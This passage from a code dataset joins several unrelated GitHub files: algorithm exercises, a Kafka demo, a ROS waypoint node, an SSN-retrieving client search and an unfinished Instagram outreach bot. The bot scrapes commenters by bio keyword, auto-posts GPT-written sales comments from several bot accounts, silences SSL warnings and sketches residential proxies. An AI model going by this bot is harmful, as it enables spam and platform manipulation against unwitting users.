mlem2.delAttrFromRule(rules[12],'Concurrent_Credits')\n\n\n\n    # ====\n\n    # read data\n    filepath = '/mnt/data/uci/'+FILENAME+'/'+FILENAME+'-train'+str(iter1)+'-'+str(iter2)+'.tsv'\n    decision_table = mlem2.getDecisionTable(filepath)\n    decision_table = decision_table.dropna()\n    decision_table.index = range(decision_table.shape[0])\n\n    # read nominal\n    filepath = '/mnt/data/uci/'+'/'+FILENAME+'/'+FILENAME+'.nominal'\n    list_nominal = mlem2.getNominalList(filepath)\n\n    # objects satisfying the rule -- there are hardly any...\n    match_objects = decision_table.apply(lambda obj: isExplainRule(obj, rules[12], list_judgeNominal), axis=1)\n\n    # confidence\n    getConfidence(rule, decision_table, list_judgeNominal)\n\n    rules_sex_2 = mlem2.getRulesIncludeE(rules, \"Sex_Marital_Status\",\"2.0\")\n\n\n","repo_name":"okiyuki99/research_dr","sub_path":"python/MLEM2/discrimination.py","file_name":"discrimination.py","file_ext":"py","file_size_in_byte":12551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2100299731","text":"import sys ## input , output\nimport statistics ## find middle Value\n\nnum_arr = int(sys.stdin.readline())\n\narr = []\ncount = [0]*8001\n\nsum_all = 0\nmax_num = 0\nmin_num = 0\nFreq = 0\nFreq_num = 0\n\n##set values\nfor i in range(0,num_arr):\n    num_check = int(sys.stdin.readline())\n    arr.append(num_check)\n\n    if num_check < 0 :\n        count[(num_check*-1)+4000] += 1\n    else :\n        count[num_check] += 1\n\n    sum_all = sum_all + arr[i]\n\n    if i == 0:\n        max_num = arr[0]\n        min_num = arr[0]\n    else :\n        if arr[i]>max_num:\n            max_num = arr[i]\n        elif arr[i]<min_num:\n            min_num = arr[i]\n\n##Find the most frequent values (negatives are stored at index -x+4000)\nFreq = max(count)\nFreq_arr = []\nfor i in range(0,8001):\n    if count[i] == Freq:\n        if i<=4000:\n            Freq_arr.append(i)\n        if i>4000: \n            Freq_arr.append((i*-1)+4000)\n\n## Find Frequency number\nFreq_arr.sort()\nlen_Feq = len(Freq_arr)\nif len_Feq == 1:\n    Freq_num = Freq_arr[0]\nelse:\n    Freq_num = Freq_arr[1] \n\n\n\n##Sorting array and Finding middle of array \narr.sort()\nmid_value = statistics.median(arr)\n\n\n\n##print 
result\nprint(round(sum_all/num_arr))\nprint(mid_value)\nprint(Freq_num)\nprint(max_num-min_num)\n\n\n\n\n\n","repo_name":"YuHyeonGeun-KOR/My-Algorithm-Journey","sub_path":"BAEKJOON/Sort Algorithm/2108(statistical science).py","file_name":"2108(statistical science).py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72497041794","text":"from aws_xray_sdk.core import xray_recorder\n\n\n@xray_recorder.capture()\ndef get_clients(**kwargs):\n    driver = kwargs['driver']\n    client_search_data = {\n        'teams': 1,\n        'client_id': 1,\n        'last_name': 1,\n        'first_name': 1,\n        'text28': 1,\n        'dob': 1,\n        'ssn': 1,\n        'primary_assigned': 1,\n        'client_status_f': 'ALL ACTIVE'\n    }\n    results = driver.process_advanced_search('Clients', client_search_data)\n    return {'patients': results, 'id_source': driver.id_source}\n","repo_name":"AlgernonSolutions/incredible_algernon","sub_path":"src/toll_booth/tasks/get_clients.py","file_name":"get_clients.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35862290797","text":"# Example to test connectivity to Kafka\n# Author: Ozzie Farfan\n\nfrom kafka import KafkaProducer\nimport time\n\nmykafkaserver=\"localhost:9092\"\nmytopic=\"ozsample1\"\nmytopic=\"oztest1\"\n\ntry:\n    producer = KafkaProducer(bootstrap_servers=mykafkaserver)\n    # producer = KafkaProducer(bootstrap_servers='10.230.89.218:9092')\nexcept Exception as e:\n    print(\"Error connecting to Kafka\")\n    print(e)\n\n# producer.send('sample', b'Mi Primer Kafka Producer') \n\nmymessage = ['Bienvenido','a Kafka','una aventura','en el manejo','de eventos']\n\nkey=1001\nfor m in mymessage:\n    key = key + 1\n    mkey = 'message-'+str(key)\n    print(\"sending \",mkey,\" = \",m)\n    # message encoded to ensure valid unicode as expected by Kafka\n    key_bytes = bytes(mkey, encoding='utf-8')\n    value_bytes = bytes(m, encoding='utf-8')\n    producer.send(mytopic, key=key_bytes, value=value_bytes)\n    producer.flush()\n    # delay introduced just for illustration purposes (not needed by Kafka)\n    time.sleep(1)\n\n","repo_name":"ozzie2080/KafkaMogoDbDockerPy","sub_path":"example-producer.py","file_name":"example-producer.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25687710113","text":"def binary_search(l, u, f):\n    \"\"\"Binary search f(x) == 0 on ints in range [l, u].\"\"\"\n    while l < u:\n        m = l + (u - l) // 2  # floor division keeps the midpoint an int on Python 3\n        v = f(m)\n        if v == 0:\n            return m\n        elif v < 0:\n            l = m + 1\n        else:\n            u = m - 1\n    return l\n\n\ndef find_kth(A, B, k):\n    \"\"\"\n    >>> find_kth([1, 3, 5, 7], [2, 4, 6, 8], 1)\n    1\n    >>> find_kth([1, 3, 5, 7], [2, 4, 6, 8], 2)\n    2\n    >>> find_kth([1, 3, 5, 7], [2, 4, 6, 8], 8)\n    8\n    >>> find_kth([4, 5, 6, 7, 8, 9], [1, 2, 3], 8)\n    8\n    >>> find_kth([4, 5, 6, 7, 8, 9], [1, 2, 3], 4)\n    4\n    >>> find_kth([4, 5, 6, 7, 8, 9], [1, 2, 3], 9)\n    9\n    >>> find_kth([4, 5, 6, 7, 8, 9], [1, 2, 3], 3)\n    3\n    >>> find_kth(range(1, 100, 2), range(2, 100, 2), 1)\n    1\n    >>> find_kth(range(1, 100, 2), range(2, 100, 2), 3)\n    3\n    >>> find_kth(range(1, 100, 2), range(2, 100, 2), 47)\n    47\n    >>> find_kth(range(1, 100, 2), range(2, 100, 2), 93)\n    93\n    >>> find_kth([100, 101, 102], range(1, 100), 93)\n    93\n    >>> find_kth(range(1, 100), [100, 101, 102], 93)\n    93\n    >>> find_kth([1, 2, 3], range(100, 200), 94)\n    190\n    >>> find_kth(range(100, 200), [1, 2, 3], 94)\n    
190\n \"\"\"\n\n def cmp(i):\n \"\"\"If we grab the first i elements from A and j = k - i from B,\n are these 2 slices compatible to finding our solution?\n\n Returns: -1 if i is too small, +1 if i is too big\n \"\"\"\n j = k - i\n\n # General case.\n if i == 0 or (j > 0 and A[i-1] <= B[j-1]):\n if i == len(A) or B[j-1] <= A[i]:\n return 0\n else:\n return -1\n elif j == 0 or (i > 0 and B[j-1] < A[i-1]):\n if j == len(B) or A[i-1] <= B[j]:\n return 0\n else:\n return +1\n else:\n raise ValueError('Wtf?')\n\n # Compute lower and upper bound for i.\n lower_bound_i = max(0, k - len(B))\n upper_bound_i = min(k, len(A))\n i = binary_search(lower_bound_i, upper_bound_i, cmp)\n j = k - i\n if i == 0:\n return B[j-1]\n elif j == 0:\n return A[i-1]\n else:\n return max(A[i-1], B[j-1])\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","repo_name":"mihneagiurgea/pysandbox","sub_path":"ctci/epi_ch8p8.py","file_name":"epi_ch8p8.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"42496812521","text":"# Import necessary libraries\nfrom flask import Flask, jsonify, request, session, render_template, url_for, redirect\nfrom flask import Flask, session\nfrom flask_session import Session\nimport json\nimport requests\nfrom google.auth import exceptions\nimport gspread\nfrom google.oauth2 import service_account\nfrom google.auth.exceptions import GoogleAuthError\nfrom datetime import datetime, timedelta\nimport random\nimport signal\nimport sys\nfrom dotenv import load_dotenv\nimport openai # Make sure to have OpenAI Python library installed\nimport os\n\n#-------------------------------------------------------------------------------------------------------------------\n# Step 1: Define Tool Functions and Environment Variables\n#------------------------------------------------------------------------------------\ndef initialize_sheet(sheet_number):\n # Load credentials from the JSON file\n try:\n gc = gspread.service_account(filename='/home/ubuntu/aibot_twitter/ai-bot-twitter-08dd107ad8e6.json')\n except exceptions.GoogleAuthError as e:\n print()\n print(f\"Error authenticating: {e}\")\n return None\n\n sheet_name = \"Prospected Usernames and Bot Accounts\"\n\n try:\n sh = gc.open(sheet_name)\n worksheet = sh.get_worksheet(sheet_number) # Use sheet1 or specify the desired sheet\n values = worksheet.get_all_values()\n return values\n\n except (gspread.SpreadsheetNotFound, gspread.WorksheetNotFound, IndexError):\n # If the sheet doesn't exist or if sheet_number is out of range\n print()\n print(f\"Sheet with number {sheet_number} not found or out of range.\")\n return None # Return None or handle the case accordingly\n \ndef get_instagram_data(endpoint, params):\n try:\n base_url = 'https://graph.instagram.com/v12.0/'\n response = requests.get(f'{base_url}{endpoint}', params=params)\n \n # Print the response text for debugging\n print()\n print(\"Getting IG Data..\")\n print()\n \n if response.status_code == 200 and response.text:\n return response.json()\n else:\n print()\n print(\"Failed to get data from Instagram. 
Status code:\", response.status_code)\n            print(\"IG Data Text:\", response.text)\n\n            # Print specific headers for more information\n            print(\"WWW-Authenticate Header:\", response.headers.get('WWW-Authenticate'))\n            print(\"X-FB-Debug Header:\", response.headers.get('X-FB-Debug'))\n            print(\"IG-Api-Error-Message Header:\", response.headers.get('IG-Api-Error-Message'))\n\n            # Check if the response can be parsed as JSON and contains error_subcode\n            try:\n                error_json = response.json()\n                if 'error_subcode' in error_json:\n                    error_subcode = error_json['error_subcode']\n                    print(f\"Error Subcode: {error_subcode}\")\n            except json.JSONDecodeError:\n                print()\n                print(\"Error decoding JSON; the error sub-code cannot be found or read.\")\n            return None\n    except requests.RequestException as e:\n        print()\n        print(f\"Error making Instagram API request: {e}\")\n        print(f\"Response text: {response.text}\")\n        return None\n\n# Load environment variables from .env\nload_dotenv()\nglobal zyteAPI, zyte_creds_path\nuser_id = \"test user id\" # Replace with your actual user_id\n# Google sheets variables \ncreds_sheet = initialize_sheet(0) # Use the index of the sheet (0 for code setup, 1 for bot accounts, 2 for posts, 3 for prospects)\n#print(\"DEBUG: creds_sheet:\", creds_sheet)\nbots_sheet_data = initialize_sheet(1) #setup_file.get_worksheet(1).get_all_records()\nposts_sheet_data = initialize_sheet(2) #setup_file.get_worksheet(2).get_all_records()\nprospects_sheet_data = initialize_sheet(3) #setup_file.get_worksheet(3).get_all_records()\nhashtags_sheet_data = initialize_sheet(4)\n\nbot_app_id = bots_sheet_data[1][3]\nbot_secret = bots_sheet_data[1][4]\n\nopenai.api_key = creds_sheet[0][1]\nDIALOGFLOW_KEY_FILE = creds_sheet[1][1]\nzyteAPI = creds_sheet[2][1]\nzyte_creds_path = creds_sheet[3][1]\nos.environ['REQUESTS_CA_BUNDLE'] = '/etc/ssl/certs/ca-certificates.crt'\n\n# Suppress only the InsecureRequestWarning from urllib3 needed for SSL verification\nrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\n#Setup residential proxy with Zenrows API\n#print(f\"Key set: {zrosAPI}\")\n#res_proxy = f\"http://{zrowsAPI}:premium_proxy=true&proxy_country=us@proxy.zenrows.com:8001\"\n#res_proxies = {\"http\": res_proxy, \"https\": res_proxy}\n\n# Initialize DialogFlow client\nscope = ['https://www.googleapis.com/auth/dialogflow']\ntry:\n    credentials = service_account.Credentials.from_service_account_file(\n        DIALOGFLOW_KEY_FILE, scopes=scope\n    )\n    client = gspread.authorize(credentials)\nexcept GoogleAuthError as e:\n    print(f\"Error initializing Google Sheets client: {e}\")\n\n# Define your Instagram accounts and proxy configurations\nbots = []\nfor row in bots_sheet_data:\n    bot = {\n        \"username\": row[0],\n        \"password\": row[1],\n        \"access_token\": \"{}|{}\".format(bot_app_id, bot_secret),\n    }\n\n    bots.append(bot)\n\n#Debug Auth\nprint()\nprint(f\"Starting Bot.. with credentials \\n(Secret: {bot_secret}, ID: {bot_app_id})\")\n\n#Get and return iguser id to get hashtag\ntry:\n    # the bot dict key is the lowercase 'access_token'\n    params = {'fields': 'id', 'access_token': bots[0].get(\"access_token\")}\n    response = get_instagram_data('ig_user_id', params) # Replace 'ig_user_id' with the actual endpoint\n\n    if response and 'id' in response:\n        user_id = response['id']\n        bots_sheet_data[1][5] = user_id\n\nexcept Exception as e:\n    print()\n    print(f\"Error getting Instagram User ID: {e}\")\n\nprint(f\"Running bot as user: {user_id}\")\nprint()\nprint()\nprint(\"Tool functions operational. Initializing application functions..\")\nprint()\n\n\n# Flask app for DialogFlow fulfillment\napp = Flask(__name__)\n\n# Set up a session for storing script and global status\napp.config['SESSION_TYPE'] = 'filesystem'\nSession(app)\n\n# Placeholder variable for uncontacted and contacted usernames\n#uncontacted_usernames = [...] # Replace with actual data\n#contacted_usernames = [...] # Replace with actual data\n\n# Define statistics variables\ntotal_bookings = 0\noutreach_done = 0\nscript_enabled = False\nprospecting_limit = 5\nglobal g_status\ng_status = \"Idle\"\n\n# Initialize a set to temporarily store prospected usernames\nprospected_usernames = set()\nprospecting_failed = False\n\n# Variable to store the conversation context\nconversation_context = []\n\n#-------------------------------------------------------------------------------------------------------------------\n# Step 2: Define functions\n#----------------------------------------------------------------------------------------------------\ndef update_google_sheet(sheet_name, data):\n    # Implement logic to update data in Google Sheets\n    # Example: Use gspread library to update a sheet\n    gc = gspread.service_account(filename='path/to/credentials.json')\n    sh = gc.open(sheet_name)\n    worksheet = sh.get_worksheet(0) # Assumes data is stored in the first worksheet\n\n    # Append the data to the worksheet\n    worksheet.append_table([list(data.values())])\n\n# Function to gracefully shutdown Flask server for code updates\ndef signal_handler(sig, frame):\n    print('Shutting down gracefully...')\n    # Perform cleanup tasks if necessary\n    sys.exit(0)\n\n#Function to post comment\ndef post_comment(post_id, context, access_token):\n    # Instagram Graph API request to post a comment\n    api_url = f\"https://graph.instagram.com/v12.0/{post_id}/comments\"\n\n    # Customize the message based on the previous context\n    template = {\n        'intro': \"Hello again! Let's continue our conversation.\",\n        'book_meeting': \"How about scheduling a meeting to discuss this further? It's 15-30 minutes, you can ask me any question, and I can actually answer them! You can pick a time that works for you here: [https://calendly.com/genusglobal/studios].\",\n    }\n\n    # Combine the template steps into the full message\n    full_message = f\"{context} {template[context]}\"\n\n    # Generate the comment; chat-style messages require the chat completions API,\n    # not openai.Completion with a davinci engine\n    response = openai.ChatCompletion.create(\n        model=\"gpt-3.5-turbo\",\n        messages=[{'role': 'system', 'content': 'You are a helpful assistant.'}, {'role': 'user', 'content': full_message}],\n        max_tokens=100\n    )\n    generated_message = response.choices[0].message['content'].strip()\n\n    params = {'access_token': access_token, 'message': generated_message}\n    response = requests.post(api_url, params=params) #post comment\n\n    # Check for successful comment posting\n    if response.status_code == 200:\n        print(f\"Comment posted successfully on post {post_id}\")\n    else:\n        print(f\"Error posting comment on post {post_id}. Status code: {response.status_code}\")\n\n#Fetch Hashtag IDs to do search\ndef get_hashtag_id(hashtag):\n    #Get and Return Hashtag ID\n    try:\n        params = {'user_id': user_id, 'q': hashtag}\n        response = get_instagram_data('ig_hashtag_search', params)\n\n        if response and 'data' in response:\n            hashtag_data = response['data']\n            if hashtag_data:\n                # Assuming the first result contains the desired hashtag ID\n                return hashtag_data[0].get('id')\n\n    except Exception as e:\n        print(f\"Error converting hashtag to ID: {e}\")\n    return None\n\n\n#KPI 1 - Get posts\ndef search_posts_by_hashtag(hashtag):\n    try:\n        # Get hashtag ID\n        hashtag_id = get_hashtag_id(hashtag)\n        update_global_status(f\"Searching hashtag: {hashtag_id}\")\n\n        # Store hashtag ID in Google Sheets\n        if hashtag_id:\n            hashtags_sheet_data[1][3] = hashtag_id\n\n        # Search using the hashtag ID\n        params = {'q': hashtag_id, 'access_token': bots[0].get(\"access_token\")}\n        return get_instagram_data('ig_hashtag_search', params)\n\n    except Exception as e:\n        print(f\"Error searching posts by hashtag: {e}\")\n        return None\n\n#KPI 2 - Get prospects from posts\ndef process_comments(media_id, keyword, access_token):\n    global prospect_username # Assuming you have a global variable for the Google Sheet\n\n    # Fetch comments for a given media id\n    comments_data = get_instagram_data(f'{media_id}/comments', {'access_token': access_token})\n\n    # Process comments and update Google Sheets when keyword is found in the user's bio\n    for comment in comments_data['data']:\n        username = comment['username']\n\n        # Fetch user bio using Instagram Graph API\n        user_data = get_instagram_data(username, {'fields': 'biography', 'access_token': access_token})\n        user_bio = user_data.get('biography', 'Bio not available')\n\n        # Check if the keyword is in the user's bio\n        if keyword in user_bio.lower():\n            prospect_username = username\n            # Update prospects sheet using the global variable (replace this with your actual logic)\n            update_google_sheet(prospects_sheet_data, username)\n            update_global_status(f\"Updating prospects sheet with Username: '{username}', Bio: '{user_bio}'.\")\n\n#KPI 3 - Tier 1 Outreach\ndef generate_comments_and_mark_contacted(username):\n    # Implement logic to generate comments and mark as contacted\n    global outreach_done\n    # Example: Fetch user posts, generate comments, and mark as contacted\n    user_posts = get_instagram_data(f'{username}/media', {'access_token': 'your_access_token'})\n\n    # Pick three random posts from the 'data' list of the API response\n    selected_posts = random.sample(user_posts['data'], 3)\n    post1 = selected_posts[0]\n    post2 = selected_posts[1]\n    post3 = selected_posts[2]\n\n    # Leave a comment on one post\n    comment_text = get_instagram_data(f'{post1[\"id\"]}/caption', {'access_token': 'your_access_token'})\n    post_comment(post1['id'], comment_text, 'your_access_token')\n\n    # Leave a call-to-action (CTA) on another post\n    cta_text = get_instagram_data(f'{post2[\"id\"]}/caption', {'access_token': 'your_access_token'})\n    post_comment(post2['id'], cta_text, 'your_access_token')\n\n    # Schedule a comment for the third post\n    scheduled_comment = get_instagram_data(f'{post3[\"id\"]}/caption', {'access_token': 'your_access_token'})\n    post_comment(post3['id'], scheduled_comment, 'your_access_token')\n\n    #mark as contacted\n    outreach_done += 1\n    update_global_status(f\"Tier 1 Outreach complete. 
Current Outreach: {outreach_done}\")\n \n \n#KPI 4 - Tier 2 Outreach\ndef check_and_respond_to_dm_inquiries(bot_account):\n messages = get_instagram_data(f'{bot_account}/messages', {'access_token': 'your_access_token'})\n for message in messages['data']:\n # Example: Use DialogFlow to check for inquiries and respond accordingly\n #Dialogflow implementation\n update_global_status(\"Feature undeveloped. Current logic sound.\")\n\ndef follow_up_with_usernames(uncontacted_usernames, contacted_usernames):\n for username in uncontacted_usernames:\n user_posts = get_instagram_data(f'{username}/media', {'access_token': 'your_access_token'})\n # Example: Generate comments and schedule follow-ups\n\ndef post_ad_posts_with_tensorflow():\n # Implement logic to post ad posts with TensorFlow model\n # Example: Use TensorFlow model to generate ad posts and post them\n update_global_status(\"Feature undeveloped. Current logic sound.\")\n\ndef generate_and_post_story():\n # Implement logic to generate and post a story\n # Example: Use Instagram Graph API to post a story\n update_global_status(\"Feature undeveloped. Current logic sound.\")\n\ndef schedule_posts(posts_type, schedule_date):\n # Implement logic to schedule posts\n # Example: Schedule posts based on specified type and date\n update_global_status(\"Feature undeveloped. Current logic sound.\")\n\n#meetings using air.ai\ndef close_meetings():\n #run once a day \n \n #Get google sheet with numbers\n \n #run air.ai for all numbers not proccessed\n \n #if lead purchased service, fulfill service\n #Service Fulfillment:\n \n #if lead scheduled again, verify booking \n \n #else just mark notes\n \n #mark the messaged as contacted with result, and update control panel\n update_global_status(\"Meetings Closed.\")\n \n\n# Main script to execute the Instagram Graph API workflow\ndef instagram_graph_api_script():\n # Loop for 30 times (Step 7)\n # 7. KPI#1: Search recent posts by hashtag and store data in posts sheets\n for hashtag in hashtags_sheet_data:\n posts_data = search_posts_by_hashtag(hashtag)\n \n # Store relevant data in posts sheet\n if posts_data is not None and 'data' in posts_data:\n for post in posts_data.get('data', []):\n data_to_store = {\n 'media_id': post.get('id'),\n 'timestamp': datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n 'user_id': post.get('user', {}).get('id'),\n 'username': post.get('user', {}).get('username'),\n 'caption': post.get('caption', {}).get('text', '')\n }\n update_google_sheet('posts_sheet', data_to_store)\n # Set date to run again.\n else:\n print(\"Error: No data or invalid data from Instagram API\")\n break\n\n update_global_status(\"Weekly API calls used. Initial prospecting complete.\")\n \n # 8. KPI#2: Process comments and store prospects\n for post_data in posts_sheet_data:\n process_comments(post_data['media_id'], \"keyword\")\n update_global_status(\"Usernames generated. Ready for outreach\")\n \n # 9. KPI#3: Generate comments and mark as contacted, outreach lvl 1\n for username in comment_sheet_data:\n generate_comments_and_mark_contacted(username)\n update_global_status(\"Outreach completed. Stats updated.\")\n \n # 10. KPI#4: 4x a day, get messages from bot account and respond to inquiries\n for _ in range(4):\n check_and_respond_to_dm_inquiries(bots_sheet_data['bot_account'])\n update_global_status(\"Inbox processed.\")\n\n # 11. 
For each uncontacted username, get two random posts, generate comment on one, and mark follow-up date\n #follow_up_with_usernames(uncontacted_usernames, contacted_usernames)\n\n # 12. Check if any contacted usernames have a follow-up\n # (Implementation depends on your specific logic for follow-ups)\n\n # 13. Post batch of ad posts with TensorFlow model\n #post_ad_posts_with_tensorflow()\n\n # 14. Generate and post story\n #generate_and_post_story()\n\n # 15. Check to see if new comments, posts, or stories need to be scheduled\n #schedule_posts(\"comments\", datetime.now() + timedelta(days=1))\n #schedule_posts(\"posts\", datetime.now() + timedelta(days=2))\n #schedule_posts(\"stories\", datetime.now() + timedelta(days=random.randint(1, 3)))\n \n\n#-------------------------------------------------------------------------------------------------------------------\n# Step 3: Define routes for your control panel\n#-------------------------------------------------------------------------------------------------------------------\n# Define route to display the control panel\n@app.route('/control_panel')\ndef control_panel():\n # Get actual data, e.g., script status, meetings booked, outreach count\n #script_status = \"Off\" # Replace with actual script status\n \n # Get the script status from the session variable\n script_status = session.get('script_enabled', False)\n global_status = session.get('global_status', g_status)\n\n meetings_booked = 0 # Replace with actual data\n outreach_count = outreach_done # Replace with actual data\n return render_template('control_panel.html', script_status=script_status, meetings_booked=meetings_booked, outreach_count=outreach_count, global_status=global_status)\n\n# Example route to update the global status\n@app.route('/update_global_status/')\ndef update_global_status(status):\n # Update the global status\n g_status = status\n print(g_status)\n session['global_status'] = g_status\n return redirect(url_for('control_panel'))\n\n#route to send shutdown signal from control panel \n@app.route('/shutdown', methods=['POST'])\ndef shutdown():\n print(\"Shutting down gracefully...\")\n os.kill(os.getpid(), signal.SIGINT)\n return 'Server shutting down...'\n\n@app.route('/toggle_script', methods=['POST'])\ndef toggle_script():\n global script_enabled # Declare script_enabled as global\n\n # Retrieve the current script status from the session variable\n script_enabled = session.get('script_enabled', False)\n\n # Toggle the script status\n script_enabled = not script_enabled\n \n # Run the script if it's enabled\n if script_enabled:\n instagram_graph_api_script()\n\n # Update the session variable with the new script status\n session['script_enabled'] = script_enabled\n\n return redirect(url_for('control_panel'))\n\n# Example: Function to handle the Dialogflow webhook request\n@app.route('/dialogflow-webhook', methods=['POST'])\ndef dialogflow_webhook():\n req = request.get_json()\n\n # Placeholder code, replace with actual DialogFlow intent handling\n intent = req['queryResult']['intent']['displayName']\n if intent == 'Inquiry':\n # Implement logic for handling the specific intent, send booking link with chat GPT format\n fulfillment_text = 'Your fulfillment text here.'\n else:\n # Handle other intents if needed\n fulfillment_text = 'Default fulfillment text.'\n\n return jsonify({'fulfillmentText': fulfillment_text})\n\n\n# Start the Flask server\nif __name__ == '__main__':\n # Set up a signal handler for graceful shutdown\n signal.signal(signal.SIGINT, 
signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n \n app.run(host='0.0.0.0', port=80) # Start the Flask server for DialogFlow request fulfillment\n # Run the Instagram Graph API script\n instagram_graph_api_script()\n","repo_name":"genusglobalinc/aibot_twitter","sub_path":"igbot_v1.py","file_name":"igbot_v1.py","file_ext":"py","file_size_in_byte":20087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20536968055","text":"#! /usr/bin/env python3\n\nimport rospy\nimport actionlib\nimport time \nimport sys\nfrom std_msgs.msg import Float64\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Pose\n\nfrom bluerov_sim.msg import WaypointAction, WaypointGoal, WaypointResult\n\n\n\n\nclass LawnMower():\n\n def __init__(self):\n\n #sub\n #pub\n #self.WayPub = rospy.Publisher(\"/bluerov/SetWayPoint\", Pose, queue_size=1)\n\n #action \n \n\n self.Max_x = 2\n self.Max_y = 2\n self.ConstDepth = - 1\n\n try:\n result = self.MowTheLawn()\n rospy.loginfo(\"RESULT: \"+str(result.success))\n except rospy.ROSInterruptException:\n rospy.loginfo(\"Move up task interrupted with error: \" + str(sys.stderr))\n \n\n def MowTheLawn(self):\n\n Lawnmower_client = actionlib.SimpleActionClient(\"WayPointActionServer\", WaypointAction)\n\n x = self.Max_x\n y = self.Max_y\n z = self.ConstDepth\n\n result = WaypointResult()\n pose_pub = Pose()\n Lawnmower_client.wait_for_server()\n\n goal = WaypointGoal()\n\n for x in range(-self.Max_x,self.Max_x +1):\n for y in range(-self.Max_y,self.Max_y +1):\n pose_pub.position.x = x\n pose_pub.position.y = y\n pose_pub.position.z = z\n\n goal.waypoint = pose_pub\n print(goal.waypoint)\n\n Lawnmower_client.send_goal(goal)\n\n Lawnmower_client.wait_for_result()\n\n result = Lawnmower_client.get_result()\n\n #self.WayPub.publish(pose_pub)\n #print(x,y,z)\n\n return result\n \n \nif __name__ == \"__main__\":\n rospy.init_node(\"lawnmower\")\n LawnMower()\n rospy.spin()\n\n\n\n\n\n\n\n\n","repo_name":"alxmeen/bluerov_sim_thesis","sub_path":"nodes/LawnMow.py","file_name":"LawnMow.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"29554240670","text":"\"\"\"mobify\n\nDownload a web page (set of web pages) as an e-book.\n\nUsage:\n mobify URL ... 
[--source=<source>]\n    mobify (-h | --help)\n    mobify --version\n\nOptions:\n    URL                Space-separated list of URLs to fetch.\n    -h --help          Show this screen.\n    --source=<source>  Force a given source type\n    --version          Show version.\n\"\"\"\n\nimport logging\n\nfrom docopt import docopt\n\nfrom .errors import MobifyError\nfrom .publisher import Publisher\nfrom .version import version\n\n\ndef main():\n    \"\"\" Main entry point for CLI\"\"\"\n    logger = logging.getLogger(__name__)\n\n    arguments = docopt(__doc__, version='mobify {}'.format(version))\n    logger.debug('Options: {}'.format(arguments))\n\n    chapters = arguments['URL']\n    logger.info('URL: {}'.format(chapters))\n\n    try:\n        publisher = Publisher(chapters=chapters, source_hint=arguments.get('--source'))\n        publisher.publish()\n\n        # store urls in the .mobify_history file\n        with open('.mobify_history', 'a') as f:\n            for url in chapters:\n                f.write(url + '\\n')\n\n    except MobifyError as ex:\n        logger.error('Failed to generate an ebook', exc_info=True)\n\n        print(ex)\n        exit(2)\n","repo_name":"macbre/mobify","sub_path":"mobify/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"5259497726","text":"import numpy as np\n\ndef zero_pad(aux,nk1,nk2,nk3,nfft1,nfft2,nfft3):\n    '''\n    Pad frequency domain with zeroes, such that any relationship between\n    aux[k] and aux[N-k] is preserved.\n\n    Arguments:\n        aux (ndarray): unpadded frequency domain data\n        nk1 (int): current size of aux along axis 0\n        nk2 (int): current size of aux along axis 1\n        nk3 (int): current size of aux along axis 2\n        nfft1 (int): number of zeroes to pad axis 0 by\n        nfft2 (int): number of zeroes to pad axis 1 by\n        nfft3 (int): number of zeroes to pad axis 2 by\n\n    Returns:\n        auxp3 (ndarray): padded frequency domain data\n    '''\n    # post-padding dimensions\n    nk1p = nfft1+nk1\n    nk2p = nfft2+nk2\n    nk3p = nfft3+nk3\n    # halfway points\n    sk1 = int((nk1+1)/2)\n    sk2 = int((nk2+1)/2)\n    sk3 = int((nk3+1)/2)\n    # parities (even <-> p==1)\n    p1 = (nk1 & 1)^1\n    p2 = (nk2 & 1)^1\n    p3 = (nk3 & 1)^1\n\n    # accommodate nfft==0\n    if nfft1 == 0: p1 = 0\n    if nfft2 == 0: p2 = 0\n    if nfft3 == 0: p3 = 0\n\n    # first dimension\n    auxp1 = np.zeros((nk1,nk2,nk3p),dtype=complex)\n    auxp1[:,:,:sk3+p3]=aux[:,:,:sk3+p3]\n    auxp1[:,:,nfft3+sk3:]=aux[:,:,sk3:]\n    # second dimension\n    auxp2 = np.zeros((nk1,nk2p,nk3p),dtype=complex)\n    auxp2[:,:sk2+p2,:]=auxp1[:,:sk2+p2,:]\n    auxp2[:,nfft2+sk2:,:]=auxp1[:,sk2:,:]\n    # third dimension\n    auxp3 = np.zeros((nk1p,nk2p,nk3p),dtype=complex)\n    auxp3[:sk1+p1,:,:]=auxp2[:sk1+p1,:,:]\n    auxp3[nfft1+sk1:,:,:]=auxp2[sk1:,:,:]\n\n    # halve Nyquist axes\n    if p1:\n        auxp3[ sk1,:,:] /= 2\n        auxp3[-sk1,:,:] /= 2\n    if p2:\n        auxp3[:, sk2,:] /= 2\n        auxp3[:,-sk2,:] /= 2\n    if p3:\n        auxp3[:,:, sk3] /= 2\n        auxp3[:,:,-sk3] /= 2\n\n    return(auxp3)\n\n\ndef zero_pad_float(aux,nk1,nk2,nk3,nfft1,nfft2,nfft3):\n    \"\"\" Deprecated. 
